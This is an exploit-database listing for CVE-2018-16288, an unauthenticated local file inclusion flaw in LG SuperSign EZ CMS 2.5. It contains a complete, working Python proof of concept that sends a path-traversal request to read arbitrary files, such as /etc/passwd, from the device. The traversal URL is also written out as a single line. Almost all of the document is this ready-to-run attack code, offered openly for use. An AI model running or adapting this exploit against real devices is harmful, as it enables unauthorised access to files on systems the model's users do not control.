Lucene search

K
zdtAlejandro Fanjul1337DAY-ID-31134
HistorySep 19, 2018 - 12:00 a.m.

LG SuperSign EZ CMS 2.5 - Local File Inclusion Vulnerability

2018-09-1900:00:00
Alejandro Fanjul
0day.today
21

EPSS

0.104

Percentile

95.0%

Exploit for hardware platform in category web applications

# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSign EZ (CMS)
# Tested on: Web OS 4.0
# CVE : CVE-2018-16288
 
# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
# Any user can read files from the TV, without authentication due to an existing LFI in the following path:
 
# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
 
# PoC
 
import requests
import re
from argparse import ArgumentParser
 
parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-p", "--path", dest="filepath",
                        help="path to the file you want to read")
 
args = parser.parse_args()
path = args.filepath
 
s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path))
print s.text

#  0day.today [2018-09-19]  #

EPSS

0.104

Percentile

95.0%